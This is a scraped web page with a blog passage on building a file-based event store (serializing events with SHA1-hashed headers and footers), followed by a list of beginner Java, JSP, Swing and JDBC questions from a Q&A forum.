(starting from 1 for the first event in the life cycle of an aggregate) and - the hash code of the serialized event to recognize whether the data is corrupt or has been tampered. Let’s start and create a class that allows us to append an array of bytes (the serialized event) to the file which contains all events of an aggregate. This class has an Append method which accepts as parameter the said array of bytes. Note that for write operations the file is opened in a mode that allows a single writer but many concurrent readers (line 16). We use a helper class TapeStreamSerializer to do the actual write operation. Note that in this first draft we always write version = 1 to the file, no matter how many events we already have stored before. Lets now look into the TapeStreamSerializer class. The WriteRecord method uses a binary serializer to write the record into a memory stream. We also use the SHA1Managed class of the .NET framework to calculate the hash code of the serialized event. On line 22 to 24 we create a header containing the length of the serialized event (the data array) and write it into the memory stream. Then on line 26 we write the actual data array into the memory stream and on lines 27 to 31 we add a footer section to the stream. The footer contains once again the length of the data array, the version of the event and the hash code computed from the data array. Once we have everything written to the memory stream we append this data to the file (line 34) and we are done. The above method uses two simple helper methods to write a 64bit integer (lines 23, 28 and 29) and a hash code (line 30) into the memory stream. Reading events from the event store We now want a way to read all existing events of a given aggregate from the event store. For this purpose we implement the ReadRecords method in our FileTapeStream class. On line 42 we make sure we arrived at the end of the file and no more records can be retrieved. On line 45 we again use the helper class TapeStreamSerializer to do the actual reading of a single event record from the file. The above method returns an array of TapeRecord items. A TapeRecord item contains the serialized event as well as its version Let’s now look into the ReadRecord method of the helper class. We basically have to revert the write operation we described earlier. First we try to locate/read and validate the header information (line 72-74). The header has a fixed length, thus we know exactly how many bytes to read. Then we read the data (lines 76 and 77). We know how many bytes we need to read since the data length was stored in the header. Finally we read and verify the footer which is also of fixed length (line 79-92). Specifically we make sure that the stored hash code corresponds to the ad-hoc calculated hash code of the data array (line 83-91). We use the following helper method to read a 64bit integer and this one to read the hash code and finally this one to read and verify a specific signature like e.g. ‘header start’ or ‘footer end’. Summary In this post we discussed in detail how events generated by aggregates are serialized and the appended to the event store. I also showed how those serialized events can be read from the event store. In my next post I will discuss how we can integrate this code into our sample application. Stay tuned. Pingback: The Morning Brew - Chris Alcock » The Morning Brew #1136()
https://lostechies.com/gabrielschenker/2012/06/30/how-we-got-rid-of-the-databasepart-6/
CC-MAIN-2017-09
refinedweb
1,896
60.04
On Fri, 11 Jul 2008 15:14:43 +0100 David Howells wrote: > Fix warnings on calls to P54P_READ() for which the result is discarded because > the side-effect of accessing hardware is what's of interest, not the result of > performing the read. > > The warnings are of the form: > > drivers/net/wireless/p54/p54pci.c:55: warning: value computed is not used hm, why aren't I seeing these? > Casting to (void) gets rid of this. This makes the ugly uglier. Would it fix the warnings if we were to do -#define P54P_READ(r) (__force __le32)__raw_readl(&priv->map->r) +static inline __le32 p54p_read(__le32 *addr) +{ + return (__force __le32)__raw_readl(addr); +} .... - P54P_READ(dev_int); + P54P_READ(&priv->map->dev_int); or something along those lines? Because the cpp trickery in there really isn't very nice. -- To unsubscribe from this list: send the line "unsubscribe linux-kernel" in the body of a message to majordomo@vger.kernel.org More majordomo info at Please read the FAQ at
http://fixunix.com/kernel/506838-%5Bpatch%5D-fix-warnings-calls-p54p_read-result-discarded.html
CC-MAIN-2016-22
refinedweb
164
66.13
Ultrasound acquisition From Phonlab The Phonology Lab has a SonixTablet system from Ultrasonix for performing ultrasound studies. Consult with Susan Lin for permission to use this system. Data acquisition workflow The standard way to acquire ultrasound data is to run an Opensesame experiment on a data acquisition computer that controls the SonixTablet and saves timestamped data and metadata for each acquisition. Prepare the experiment The first step is to prepare your experiment. You will need to create an Opensesame script with a series of speaking prompts and data acquisition commands. In simple situations you can simply edit a few variables in our sample script and be ready to go. Do not start your OpenSesame experiment until after turning the Ultrasonix system on or you risk the system not starting. Run the experiment These are the steps you take when you are ready to run your experiment: Check the audio card Normally the Steinberg UR22 USB audio interface is used to collect microphone and synchronization signals. - Plug the microphone into XLR input 1. - Plug the synchronization signal cable into XLR input 2. - Check to make sure the 'Mix' knob is turned all the way to 'DAW'. - Set the gain levels for the microphone and synchronization signals with the 'Input 1' and 'Input 2' knobs. Start the ultrasound system - Unplug one of the external monitors' video cables from the splitter that is plugged into the Ultrasonix's external video port. - Turn on the ultrasound system's power supply, found on the floor beneath the system. - Turn on the ultrasound system with the pushbutton on the left side of the machine. - Once Windows has started you can plug the second external monitor's video cable back into the splitter. - Start the Sonix RP software. - If the software is in fullscreen (clinical) mode, switch to windowed research mode as illustrated in the screenshot. Start the data acquisition system - Turn on the data acquisition computer next to the ultrasound system and use the LingGuest account. - Check your hardware connections and settings: - The Steinberg UR22 USB audio device should be connected to the data acquisition computer. - The subject microphone should be connected to 'Mic/Line 1' of the audio device. Use the patch panel if your subject will be in the soundbooth. - Make sure the '+48V' switch on the back of the audio device is set to 'On' if you are using a condenser mic (usually recommended). - Make a test audio recording of your subject and adjust the audio device's 'Input 1 Gain' setting as needed. - The synchronization signal cable should be connected to the BNC connector labelled '25' on the SonixTablet, and the other end should be connected to 'Mic/Line 2' of the audio device. - The audio device's 'Input 2 Hi-Z' button should be selected (pressed in). - The audio device's 'Input 2 Gain' setting should be at the dial's midpoint. - Open and run your Opensesame experiment. Postprocessing Each acquisition resides in its own timestamped directory. If you follow the normal Opensesame script conventions these directories are created in per-subject subdirectories of your base data directory. Normal output includes a .bpr file containing ultrasound image data, a .wav containing speech data and the ultrasound synchronization signal in separate channels, and a .idx.txt file containing the frame indexes of each frame of data in the .bpr file. Getting the code Some of the examples in this section make use of ultratils and audiolabel Python packages from within the Berkeley Phonetics Machine environment. Other examples are shown in the Windows environment as it exists on the Phonology Lab's data acquisition machine. To keep up-to-date with the code in the BPM, open a Terminal window in the virtual machine and give these commands: sudo bpm-update bpm-update sudo bpm-update ultratils sudo bpm-update audiolabel Note that the audiolabel package distributed in the current BPM image (2015-spring) is not recent enough for working with ultrasound data, and it needs to be updated. ultratils is not in the current BPM image at all. Synchronizing audio and ultrasound images The first task in postprocessing is to find the synchronization pulses in the .wav file and relate them to the frame indexes in the .idx.txt file. You can do this with the psync script, which you can call on the data acquisition workstation like this: python C:\Anaconda\Scripts\psync --seek <datadir> # Windows environment psync --seek <datadir> # BPM environment Where <datadir> is your data acquisition directory (or a per-subject subdirectory if you prefer). When invoked with --seek, psync finds all acquisitions that need postprocessing and creates corresponding .sync.txt and .sync.TextGrid files. These files contain time-aligned pulse indexes and frame indexes in columnar and Praat textgrid formats, respectively. Here 'pulse index' refers to the synchronization pulse that is sent for every frame acquired by the SonixTablet; 'frame index' refers to the frame of image data actually received by the data acquisition workstation. Ideally these indexes would always be the same, but at high frame rates the SonixTablet cannot send data fast enough, and some frames are never received by the data acquisition machine. These missing frames are not present in the .bpr file and have 'NA' in the frame index (encoded on the 'raw_data_idx' tier) of the psync output files. For frames that are present in the .bpr you use the synchronization output files to find their corresponding times in the audio file. Separating audio channels If you wish you can also separate the audio channels of the .wav file into .ch1.wav and .ch2.wav with the sepchan script: python C:\Anaconda\Scripts\sepchan --seek <datadir> # Windows environment sepchan --seek <datadir> # BPM environment This step takes a little longer than psync and is optional. Extracting image data You can extract image data with Python utilities. In this example we will extract an image at a particular point in time. First, load some packages: from ultratils.pysonix.bprreader import BprReader import audiolabel import numpy as np BprReader is used to read frames from a .bpr file, and audiolabel is used to read from a .sync.TextGrid synchronization textgrid that is the output from psync. Open a .bpr and a .sync.TextGrid file for reading with: bpr = '/path/to/somefile.bpr' tg = '/path/to/somefile.sync.TextGrid' rdr = BprReader(bpr) lm = audiolabel.LabelManager(from_file=tg, from_type='praat') For convenience we create a reference to the 'raw_data_idx' textgrid label tier. This tier provides the proper time alignments for image frames as they occur in the .bpr file. bprtier = lm.tier('raw_data_idx') Next we attempt to extract the index label for a particular point in time. We enclose this part in a try block to handle missing frames. timept = 0.485 data = None try: bpridx = int(bprtier.label_at(timept).text) # ValueError if label == 'NA' data = rdr.get_frame(int(bpridx)) except ValueError: print "No bpr data for time {:1.4f}.".format(timept) Recall that some frames might be missed during acquisition and are not present in the .bpr file. These time intervals are labelled 'NA' in the 'raw_data_idx' tier, and attempting to convert this label to int results in a ValueError. What this means is that data will be None for missing image frames. If the label of our timepoint was not 'NA', then image data will be available in the form of a numpy ndarray in data. This is a rectangular array containing a single vector for each scanline. Transforming image data Raw .bpr data is in rectangular format. This can be useful for analysis, but is not the norm for display purposes since it does not account for the curvature of the transducer. You can use the ultratils Converter and Probe objects to transform into the expected display. To do this, first load the libraries: from ultratils.pysonix.scanconvert import Converter from ultratils.pysonix.probe import Probe Instantiate a Probe object and use it along with the header information from the .bpr file to create a Converter object: probe = Probe(19) # Prosonic C9-5/10 converter = Converter(rdr.header, probe) We use the probe id number 19 to instantiate the Probe object since it corresponds to the Prosonic C9-5/10 in use in the Phonology Lab. (Probe id numbers are defined by Ultrasonix in probes.xml in their SDK, and a copy of this file is in the ultratils repository.) The Converter object calculates how to transform input image data, as defined in the .bpr header, into an output image that takes into account the transducer geometry. Use as_bmp() to perform this transformation: bmp = converter.as_bmp(data) Once a Converter object is instantiated it can be reused for as many images as desired, as long as the input image data is of the same shape and was acquired using the same probe geometry. All the frames in a .bpr file, for example, satisfy these conditions, and a single Converter instance can be used to transform any frame image from the file. These images illustrate the transformation of the rectangular .bpr data into a display image. If the resulting images are not in the desired orientation you can use numpy functions to flip the data matrix: data = np.fliplr(data) # Flip left-right. data = np.flipud(data) # Flip up-down. bmp = converter.as_bmp(data) # Image will be flipped left-right and up-down. In development Additional postprocessing utilities are under development. Most of these are in the ultratils github repository. Troubleshooting See the Ultrasonix troubleshooting page page to correct known issues with the Ultrasonix system.
http://linguistics.berkeley.edu/plab/guestwiki/index.php?title=Ultrasound_acquisition
CC-MAIN-2017-51
refinedweb
1,588
56.25
Create a WMI Event Alert a SQL Server Agent alert that is raised when a specific SQL Server event occurs that is monitored by the WMI Provider for Server Events in SQL Server 2017 by using SQL Server Management Studio or Transact-SQL. For information about the using the WMI Provider to monitor SQL Server events, see WMI Provider for Server Events Classes and Properties., using: SQL Server Management Studio Before You Begin. Only WMI namespaces on the computer that runs SQL Server Agent are supported. Security Permissions By default, only members of the sysadmin fixed server role can execute sp_add_alert. Using SQL Server Management Studio. Using Transact-SQL). Feedback Send feedback about:
https://docs.microsoft.com/en-us/sql/ssms/agent/create-a-wmi-event-alert?view=sql-server-2017
CC-MAIN-2019-18
refinedweb
113
55.34
Hello, I have been fighting with this assignment for almost 3 week now and it's almost ready besides one part that I simply don't understand. I would appreciate if someone could maybe translate it into "simple English" for me and maybe give me a little guidance. Basically we are writting a small train track simulation program ( I will include the two classes I have created later) and we are now asked to create method that will alternate in direction by presupposing that trains follow a timetable which prevents trains travelling in the same direction from colliding with each other. Here's the question: "The enterTrack() method should not allow a thread to proceed if: • the direction of travel is UP, and either there is a DOWN thread currently using the track, or the number of UP threads currently on the track is already greater than two; or • its mode is DOWN and any other threads are currently using the track. exitTrack(TrainDirection dir) which records the fact that a thread has finished using the track and wakes up any threads that are waiting." And my question is how do I go about referencing to the threads within these methods? Here's the code: The Train class: public class Train extends Thread { private Track track; private int trainId; private TrainDirection direction; public Train(TrainDirection dir, int id, Track tr) { direction = dir; trainId = id; track = tr; } public void run() { track.useTrack(direction, trainId); } } And here's the Track class I am supposed to change: public class Track { public Track() { } public void useTrack(TrainDirection dir, int id) { System.out.println("Train " + id + " entering track, going " + dir); traverse(); System.out.println("Train " + id + " leaving track, going " + dir); } public void enterTrack(TrainDirection dir) { } public synchronized void exitTrack(TrainDirection dir) { } /* You do not need to change this method */ private void traverse() { try { TimeUnit.MILLISECONDS.sleep(500); } catch (InterruptedException ie) { System.out.println(ie); } } Sorry for the long post :) I am not expecting a solution, as mentioned I just need to know how I am supposed to use threads directly in this method. Many thanks for your help and sorry if I am not clear enough in my post but Java still scares me:)
https://www.daniweb.com/programming/software-development/threads/192097/confused-with-threads-help-with-a-homework
CC-MAIN-2016-50
refinedweb
369
53.04
On Nov 10, 2009, at 9:56 AM, Steve Traylen wrote: On Tue, Nov 10, 2009 at 4:51 PM, Manuel Wolfshant <wolfy nobugconsulting ro> wrote:Farkas Levente wrote:hi,what's the proper way to distinguish epel from fedora in the spec file?i'd like to add ExcludeArch: ppc ppc64on epel but not in case of fedora in a package (since there is no javaon ppc on epel). but what's the current recommended way to do so?unfortunately %{?rhel} is not defined even in rhel-5 so what else can i Is there any problem with: %if %{el5} ExcludeArch: ppc ppc64 %endif --- derks
http://www.redhat.com/archives/epel-devel-list/2009-November/msg00027.html
CC-MAIN-2014-42
refinedweb
106
72.7
Reading a xml file April 9, 2010 at 10:48 AM how to read a xml file using jsp and then i have to retrive a data from that file use it in code? ... View Questions/Answers java April 9, 2010 at 10:32 AM Sir,My code is attached below...It shows the selected file from Jfilechooser...But we can see only a small portion...Can you help to see the full picture.....in my programThanks in advanceimport java.io.*;impor... View Questions/Answers exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0 April 9, 2010 at 9:48 AM Below class is compling but runtime i am getting the this error :exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0class xxx { public static void main(String[] args) { System.out.println("Hello World!")... View Questions/Answers Load Coursenames from MS Acess Database to JComboBox April 9, 2010 at 8:40 AM Hello sir,I want to Load/add Course names which stored in Ms Acess 2007 Database,plz help me ... View Questions/Answers Java source April 9, 2010 at 12:54 AM Can any one help me in giving example coding to automate taking pictures using web camera, please this is urgent experts help me ... View Questions/Answers core java April 9, 2010 at 12:00 AM program logic for finding entered number either positive or negative? ... View Questions/Answers MS-ACCESS Query Problem April 8, 2010 at 8:13 PM hi siri have table which is initially have empty records DeletedAttributes:RollNameAddAgeCourseClassSexHostelso another table is StudentAttributes:RollNameAddAgeC... View Questions/Answers Acees data from database using combo box April 8, 2010 at 3:09 PM please let me how i access the data from database when i select combo box combo2 having values Arts, Commerce, Science. this combo box will appear when first combo box class_name having value 11 or 12, otherwise combo box combo2 remain hide.Here is JSP's files:Here is JSP fil... View Questions/Answers How to Add JComboBox on JPanel April 8, 2010 at 3:07 PM How to Add JComboBox on JPanelD:\java>javac ViewElements.javaViewElements.java:181: <identifier> expected jc.addItem("France"); ^ViewElements.java:182: <identifier> expected jc.addItem("Germany");<... View Questions/Answers JComboBox on JRadioButton April 8, 2010 at 3:02 PM How to add JComboBox on Jpanel ,Give Me Sample Code. ... View Questions/Answers java April 8, 2010 at 2:51 PM Hi sir/madamI am Remya M R, i have written code to store the image in mysql database but i have problem in retrieving the image from the mysql database and showing the same on the java panel.So please help me by giving the sample code to retrieve theimage and showing in the java panel.... View Questions/Answers Java April 8, 2010 at 12:33 PM sir,I attached my code...To retrive the image from database through Frame...But it show the error like this.....Couldn't find file: img.jpgPlz help me...import java.awt.*;import java.awt.event.*;imp... View Questions/Answers Log In Form Validations April 8, 2010 at 11:07 AM Good Morning Sir ,I have Created Log in Form with Databse Connectivity and i have took two JTextFields 1)USERNAME2)password if two Jtextfields are blanks i want to show msg blank Username and Password , How I can Do That ,plz Help Me Sir. ... View Questions/Answers Error with JCombo Box April 8, 2010 at 11:04 AM when i set JComboBox on Tab then Display Error near addItem method,that is Identifer Expected,How I Can remove that Error. ... View Questions/Answers How to Store Date April 8, 2010 at 11:01 AM How to Validate date in JTextField ,How I can Store it in Aceess Databse,and I want to set Last Date of Admission,if Last date of admission is equal to current date then i want display Today is Last date of Admission ,if Current Date is Over than Last Date then I want to Disable All Admission ... View Questions/Answers Admission Validation April 8, 2010 at 10:54 AM Hello sir I have Designed Student Admission Form ,I want to Display Admission Status on Form that is Availbal Seats and Fillup Seats and when I FillUp 60 students in Access Databse I want to Show Status on Swing Application is that "ADMISSION FULL",How I can Show that plz Help Me Sir. ... View Questions/Answers Java April 8, 2010 at 10:14 AM sir,I make a mysql database to insert images and their features ...I attached my code to retrive the images by the given feature in the JFrameBut it cannot see the pictures in the Frame....Plz help me...p... View Questions/Answers java April 7, 2010 at 7:39 PM i just want to write program to add some n numbers it can be any 4digit or 5digir bt i nee get answer in 1 digit between 0to9 without using array using java. ... View Questions/Answers JRadio Button April 7, 2010 at 7:15 PM I have added two RadioButtons in Swing Appliction ,I want to select only one JRadioButton ,How I can Select it?plz Help Me ... View Questions/Answers Print in a long paper April 7, 2010 at 4:24 PM how to print text in long paper?? each print text, printer stops. not continue until the paper print out.Thanks ... View Questions/Answers How I Choose a folder April 7, 2010 at 3:52 PM Thanks my friend for your answer,Perhaps i do not explain clearly my question. I know how I get files from a folder. My question How I select a folder. From this selected folder i get the files.I know how I get files but the problem How I choose a fold... View Questions/Answers java April 7, 2010 at 3:28 PM Hai....Sir.........My java code is Pasted below....In this code I want to show the selected file in the panel....And Also I cannot insert values into database.........But there is ... View Questions/Answers java April 7, 2010 at 3:17 PM Is there any available system for cbir (CONTENT BASED IMAGE RETRIVAL)in java ... View Questions/Answers Importing in eclipse April 7, 2010 at 2:53 PM I'm using eclipse for designing struts application...I'm manually copying the tld files and creating struts-config.xml file for my project...Is there the best way to import the tld filesor to add the struts capabilities automatically in eclipse..?? ... View Questions/Answers how i conditional access the data from database using combo box. April 7, 2010 at 2:21 PM i have combox box named class when i select its value 11 or 12, another combo box appears named Subject values Arts, Commerce, Science.how i conditional access the data from database when i select class 11 0r 12.Here is JSP file:-display.jsp:<html>... View Questions/Answers File Upload in J2ee on solaris machine using sftp April 7, 2010 at 1:01 PM Hi,Currently we are using FTP to upload the file from our J2EE web application. This is working perfectly fine. we are using below command to do so.;type=iNow we have to change the application in such a way ... View Questions/Answers java April 7, 2010 at 12:18 PM how to a selected image set a background image in textarea ... View Questions/Answers swings April 7, 2010 at 12:00 PM hi I am using netbeans ide , while i am trying to debug my project it is giving me an error like this Have no FileObject for C:\Program Files\Java\jdk1.6.0_14\jre\lib\sunrsasign.jarHave no FileObject for C:\Program Files\Java\jdk1.6.0_14\jre\classeswh... View Questions/Answers Please develop code April 7, 2010 at 11:58 AM i want to develop a program that search a file in a directory and its subdirectories and rename that file with name of main directory ... View Questions/Answers java collections April 7, 2010 at 10:55 AM i need a sample quiz program by using collections and its property reply soon as possible .... ... View Questions/Answers Javascript code April 7, 2010 at 10:42 AM Hi, This is ragavendran.. I have a simple doubt in my project.. There is a page in which there is a table with each row ending with a hyperlink called "View Image".. Once i click that link, the particular row should be color changed.. In the second phase, if i click another li... View Questions/Answers java April 7, 2010 at 10:36 AM java code for retrive images from mysql database through jFrame ... View Questions/Answers JDBC April 7, 2010 at 9:39 AM What is mean JDBC ANY E BOOK ... View Questions/Answers java beginners April 7, 2010 at 8:08 AM pl. let me know how to exterat the decimal numbers from a number i want a java program for it Example if input 12.453OUTPUT 12 .453 if input 25.7657 OUTPUT 25 .7657 ... View Questions/Answers Java Aplications April 6, 2010 at 6:06 PM Someone please help me write this Java programsi) Imagine you need to open a standard combination dial lock but don't know the combination and don't have a pair of bolt cutters. Write a Java program that prints all possible combinations so you can print them on a piece of paper and check off e... View Questions/Answers Java Dialogs April 6, 2010 at 4:27 PM a) I wish to design a frame whose layout mimics the Firefox print dialog . (please you can go to Mozilla Firefox, click File, then Print- to see the diagram)None of the components actually have to do anything. It should just show me how to lay out components.b) I wish to write an ... View Questions/Answers jsp April 6, 2010 at 4:09 PM how can i write a java script inside a jsp.i have a form in jsp and i want to do some client side validations on it. ... View Questions/Answers JDBC April 6, 2010 at 3:06 PM How to connect to mysql database from an applets or GUI components (on J2SE) using Eclipse ? ... View Questions/Answers java log4j April 6, 2010 at 1:40 PM which is the best site to prepare log4j in java since i am new to it ... View Questions/Answers Jav Applets April 6, 2010 at 1:36 PM I need to write a small payroll program, using applet, that provides a text field for the number of hours, a text field for the pay rate, and a non-editable text field for the output. It should also also provide labels to identify all three text fields and a button to calculate the result. ... View Questions/Answers java code April 6, 2010 at 1:33 PM Imagine you need to open a standard combination dial lock but don't know the combination and don't have a pair of bolt cutters. I need to write a Java program that prints all possible combinations so you can print them on a piece of paper and check off each one as you try it. Assume the numbers on t... View Questions/Answers java April 6, 2010 at 12:14 PM java code for retrive an image from mysyl database through jFrame ... View Questions/Answers ascending or descending order in jsp using servlet April 6, 2010 at 11:54 AM My Problem is that how to sort any column in ascending or descending order,with following requirements1. A single click on the header of a certain column causes the table to re-sort based on this column.2. A repeated click on the same column changes the sort dire... View Questions/Answers java April 6, 2010 at 10:56 AM i wanna know about jgapwhat is it?why and how to use it in genetic algorithms?plzzzzzzz help me out as u r the most accurate source i had ... View Questions/Answers Jtable Question April 6, 2010 at 10:32 AM Hello Sir,I have Created Database in MS access 2007 ,I want show the table data in toSwing JTable, How I can Show it,plz Help Me Sir. ... View Questions/Answers Java singleton program April 6, 2010 at 8:35 AM Hi All,Can you please explain me in brife with an example how the singleton program works, i did see some documents but was not able to unerstand except one object can be used.this was a java interview question in Perot systems. ... View Questions/Answers Swimming Pool Calculator April 5, 2010 at 10:43 PM Okay, so I tried making the program with this coding:import java.awt.*;import javax.swing.*;import java.awt.event.*;import java.util.*;import java.io.*;import java.text.SimpleDateFormat;public class SwimmCalc extends JFrame implements Actio... View Questions/Answers Index.java April 5, 2010 at 10:14 PM I need to write a Java GUI application called Index.java that inputs several lines of text and a search character and uses String method indexOf to determine the number of occurrences of the character in the text. ... View Questions/Answers Swimming Pool Calculator April 5, 2010 at 10:11 PM I have to write a program to calculate the volume of a swimming pool. The assignment is as follows:This Swimming Pool Calculator is one that is very simple to use. As you can see, it is a user interface that will allow the user to enter the desired length, width, and average depth of a ... View Questions/Answers java April 5, 2010 at 8:24 PM sir please helpme as i need this to complete my module . q1)How to add Month in a Current Date , i am using simple Date Format in swing . ex: if Current Date is 5/4/2010 then it should displayed as 5/5/2010 q2)I have two table namely F... View Questions/Answers Login form using Jsp in hibernate April 5, 2010 at 6:24 PM Hai Friend,As I new and entering into... View Questions/Answers How to call jasper from jsp or servlet April 5, 2010 at 5:54 PM Hi Expert ,I created jasper report using ireport.how to call that jasper with jsp file or servlet file ?Thanks in advanceEswaramoorthy.s ... View Questions/Answers How To Display MS Access Table into Swing JTable April 5, 2010 at 1:10 PM How to Display Records From MS Access Database To JTable.Plz Help Me ... View Questions/Answers Ascending or descending order April 5, 2010 at 12:00 PM I have a table by name employee,attributes are emiid,fstname,lastname,address,emailid and soon..I have to create a 2 fields in a column empid,fstname,lastname1 for asc and another for desc order for each column.if i click on a asc in empid column the empid should be order in asc order an... View Questions/Answers values of Combo boxes are not stored in database April 5, 2010 at 11:28 AM i have some combo box values.when i click the submit button after select combo box values, the values are not going in database.please review the code:<%if((school.equals("indus"))||(school.equals("dps"))||(school.equals("mdn")))... View Questions/Answers exception in thread main java.lang.unsupportedclassversionerror unsupported major.minor version 50.0 April 5, 2010 at 11:12 AM I am getting the below error when the class now.java -version java version "1.4.2_06" javac -version java version "1.6.0_10" ... View Questions/Answers INSERT CAPTCHA April 5, 2010 at 10:05 AM HI ALLWISH U A GREAT DAY . I HAVE TO INSERT IMAGE CAPTCHA IN MY FORM . WHEN THE USER HAS GIVEN CORRECT INPUT , HE HAS TO GO TO SUCCESS PAGE WHEN CLICKING ON THE SUBMIT BUTTON .ANY JSCRIPT IDEAS ?THANKS IN ADVANCEES... View Questions/Answers validation of date,phone number,email April 4, 2010 at 5:43 PM Sir how to validate date,phone number and email in java swings ... View Questions/Answers date picker componnt April 4, 2010 at 5:41 PM sir i need code for date picker in java swing for my project sir please send me sir ... View Questions/Answers java April 4, 2010 at 3:35 PM Dear,Please I hope you help me. I want to select all files that ends with txt ( txt files) using Filechooser from a directory that I choose. Can you help me.With my best regards ... View Questions/Answers error occured in oracle April 4, 2010 at 12:13 PM hi... this is the error i got in oracle 11g when i am trying to insert image ORA-00984:column not allowedd here for the insert statement like this insert into imgapp('1','xxx','G:\image folder\ultrasound image\02us12a.jpg") ... View Questions/Answers oracle insert statement error April 4, 2010 at 9:55 AM hi.. please help me to insert a image into oracle 11g database and please say me how can i insert image from directory like G:\imagefolder\ultrasoundimage\02us02.jpeg please help me ... View Questions/Answers html April 4, 2010 at 12:45 AM 7) Create an HTML page containing the following featuresa. A combo box containing the list of 7 colors: Violet, Indigo, Blue, Green, Yellow, Orange, Redb. Depending upon the color selected from the above combo box, the message in the status bar of the window must be reflect the va... View Questions/Answers html April 4, 2010 at 12:43 AM 3) Create a HTML page to display a list of film songs available in the library. The following are features of the pagea. The name of the songs must be hyper linked to the songs, so that the users must be able to download songs.b. The following is the song database available in the librar... View Questions/Answers java April 3, 2010 at 12:46 PM Servlet Question April 2, 2010 at 11:39 PM I want to call one servlet when the browser window is closed by User. ... View Questions/Answers Servlet Question April 2, 2010 at 11:39 PM I want to call one servlet when the browser window is closed by User. ... View Questions/Answers storing details in database on clicking submit button April 2, 2010 at 7:58 PM I am using JSP in NetBeans and have developed an application form which has fileds naming 'Name' and 'ID'.I want to store the details of these two fields in the MYSQL database on clicking submit button. I am unable to do this.Can u tell me how to code this page and where and should be my code writte... View Questions/Answers Problem with Java Source Code April 2, 2010 at 4:12 PM Dear Sir I have Following Source Code ,But There is Problem with classes,plz Help Me.package mes.gui;import javax.swing.JOptionPane.*;import java.sql.*;import javax.swing.*;import javax.swing.border.*;import java.awt.*;import java.awt.event... View Questions/Answers blank space in input field April 2, 2010 at 3:43 PM I retrieved the fields from my mysql table...If the field contains null value i want to display a blank space in input field(text box)..but i am displaying null how to overcome this..u r help is highly appreciated. ... View Questions/Answers Re: base the value of first combo box, how i display the second combox April 2, 2010 at 1:12 PM Dear Sir,in this program when i click on submit button, the corrosponding value of combo box should be sent. but when i clicked to submit button, it do nothing.please review this code:<%if((school.equals("indus"))||(school.equals("dps"))||(s... View Questions/Answers How to change backgroundcolor and foreground color of JLabel in Java April 2, 2010 at 10:42 AM How to change backgroundcolor and foreground color of JLabel in Java ... View Questions/Answers javascript code April 2, 2010 at 4:31 AM Hi,thanks for ur slideshow coding which is very user interactive and attractive.but in this we r explicitely specifying each image file name one by one. Can we make it in a while loop which will read all the files in a image folder and display it. Kindly clarify my doubt. ... View Questions/Answers conversion April 1, 2010 at 7:54 PM how to convertor .xl to .pdf and .pdf to .xl and .mp4 to .mp3 ... View Questions/Answers Connecting JTable to database April 1, 2010 at 7:28 PM m... View Questions/Answers how to link differnt modules April 1, 2010 at 7:11 PM i am doing my final year project which is based on steganography.we hide the secret msg in the spaces between the words and paragraphs.we have around 4 modules.all the modules are running fine individually.the prob is how can i link all the 4 modules so that they work in a step by step manner.... View Questions/Answers Struts April 1, 2010 at 6:59 PM Hi, I am doing a reverse engineering in a project based on struts 1.1,after seeing the log file, i encounter some lines that are written by applicatoin, following are the lines in log related to strtus while actionservelt is doing his task.****************************o... View Questions/Answers Wireless communication April 1, 2010 at 6:33 PM I want to send and receive data(message/data) between 2 lappys which are connected in wireless lan. can u plz expalin how to start the JAVA source code?? ... View Questions/Answers Remote Location Handeling April 1, 2010 at 5:32 PM I have application where I want main control from one location and have to connect two more locations remotly and have to handle it.So what should I use in my application Server/RMI or web application?Also help me to connect me to the remote locations having main control with my location ... View Questions/Answers Re: base the value of first combo box, how i display the second combox April 1, 2010 at 3:55 PM thanks for your reply.i want to know suppose the second combo box appear only when i select the class 11th or 12th.please review.your answer:<html><h2>ComboBox</h2><script language="javascript">... View Questions/Answers datagrid search April 1, 2010 at 3:11 PM Hi friend, i have displayed a datagrid using jsp but i need a search option in that which is used to display and sort it in a alphabetical order....pls help me...Thanks in advance... ... View Questions/Answers Retrieve Value from Table April 1, 2010 at 3:05 PM Hai friend,I need help, How can i retrieve values From database using hibernate in web Application. As I new to hibernate I couldn't find solution for this problem.. Can anyone help please.. ... View Questions/Answers Html / Java Script April 1, 2010 at 2:15 PM Hi There,in my form there are ten text boxes. my requirement is that when i click checkbox,the values of first five textbox has to copy to next five. I need jscript for that ... View Questions/Answers base the value of first combo box, how i display the second combox April 1, 2010 at 1:25 PM i have a combo box for classes. my requirement is when i select the class, if class is 11 or 12 the second combo box of subject should be appear.please let me how i implement this in JSP.<%! int i=1; %><tr><td>Class</td><td><selec... View Questions/Answers java Exception handling April 1, 2010 at 12:44 PM what is the difference between throw and throws keywords ... View Questions/Answers java Exception handling April 1, 2010 at 12:42 PM what is the difference between throw and throws keywords ... View Questions/Answers Paging or pagination April 1, 2010 at 10:34 AM 1.how to do paging or pagination in jsp using servlets?I have a 20 records ,i have to show them in 2 pages like pages 1 2...i done this but i m geting starting 10 records correctly but i m unable to get a next 10 records it is showing a starting 10 records only please help me... View Questions/Answers jsp March 31, 2010 at 11:35 PM How to creat table in jsp which show single containt tha is employee nameWhen u enter the employee name and submit.then another box will display which show the every detail of the employee of the same name from data base if of employee dose not existing in same name then another box will disp... View Questions/Answers Encryption In Swing March 31, 2010 at 9:43 PM Hi sir i have a JFrame Containing User Name and Password is there any way to encrypt password and how can we store the encrypted passwaord to MS ACCESS ... View Questions/Answers javascript code March 31, 2010 at 9:00 PM hi,i want to display all the image files in a folder one by one like a slidshow on my website using javascript. Will you please help me for this??? ... View Questions/Answers SWING March 31, 2010 at 7:48 PM how to insert image and components such as JLabel,JButton,JTextfield in JFrame in swing? ... View Questions/Answers enable users to enter names March 31, 2010 at 6:51 PM this is the code for tic tac toe game, i want users can save their name as player X and player O, but I do not know how? can you give me some tips?package threeTsGame;import java.awt.*;import java.awt.event.*;import javax.swing.*;publ... View Questions/Answers core Java March 31, 2010 at 6:04 PM how is it possible to create object before calling main() in Java? ... View Questions/Answers Keep servlet session alive March 31, 2010 at 3:40 PM Hi,I am developing an application in java swing and servlet. Database is kept on server. I am using HttpClient for swing servlet communication.I want to send heartbeat message from client to server after every specific time interval so that servlet will not invalidate session... View Questions/Answers exporting data to excel sheet March 31, 2010 at 3:25 PM Sir i have already send request about this problem sir.Sir i want code for below applicationSir whenever execute query in java swing program,i want to print the result about the query in excel sheet.Sir plz help me sir. ... View Questions/Answers java March 31, 2010 at 3:06 PM siri server-jsp March 31, 2010 at 2:01 PM how can we implement a simple database(ms access) for storing information about the 